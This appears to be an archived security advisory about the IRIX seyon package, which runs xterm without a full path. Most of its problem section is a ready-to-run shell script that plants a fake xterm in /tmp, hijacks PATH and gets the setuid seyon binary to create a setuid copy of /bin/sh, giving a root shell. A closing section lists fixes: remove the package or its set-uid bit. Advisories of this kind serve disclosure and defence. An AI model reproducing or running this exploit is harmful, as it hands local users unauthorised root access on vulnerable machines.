COMMAND

    /usr/X11/bin/seyon

SYSTEMS AFFECTED

    All systems ?

PROBLEM

    Below  is  exploit  for  seyon.   It  was  done  by BeastMaster V.
    Problem is  that seyon  does not  include full  path when  execing
    xterm.   Shell  script  follows.  (btw.,  seyon  is  a serial port
    communications package for X windows).

    #!/bin/sh
    # DISCLAIMER: Please use in a responsible manner

    # Just put the full path to Seyon here
    FULL_PATH_TO_SEYON=/usr/X11/bin/seyon


    ORIGINAL_PATH=$PATH

    cat > /tmp/xterm.c << E_O_F
    #include <stdio.h>
    #include <stdlib.h>

    main () {
        system("/bin/cp /bin/sh /tmp/XxX");
        system("/bin/chmod ug+s /tmp/XxX");
    }
    E_O_F

    cc -o /tmp/xterm /tmp/xterm.c

    PATH=/tmp
    export PATH

    $FULL_PATH_TO_SEYON

    PATH=$ORIGINAL_PATH=$PATH
    export PATH

    /bin/rm /tmp/xterm.c /tmp/xterm

    echo ""
    echo ""
    echo " <-- Now type: id --<"
    echo ""

    /tmp/XxX

    rm /tmp/XxX

SOLUTION

    Silicon Graphics  distributes the  Seyon package  as an  IRIX inst
    image called "fw_MSSeyon" on the SGI Freeware 1.0 and 2.0  CDROMs.
    IRIX customers  who have  installed "fw_MSSeyon"  IRIX inst images
    from any source prior to and including v2.14c are vulnerable.  You
    can:

        I)  Remove the vulnerable seyon package.
        II) Remove the set-uid bit of the seyon program.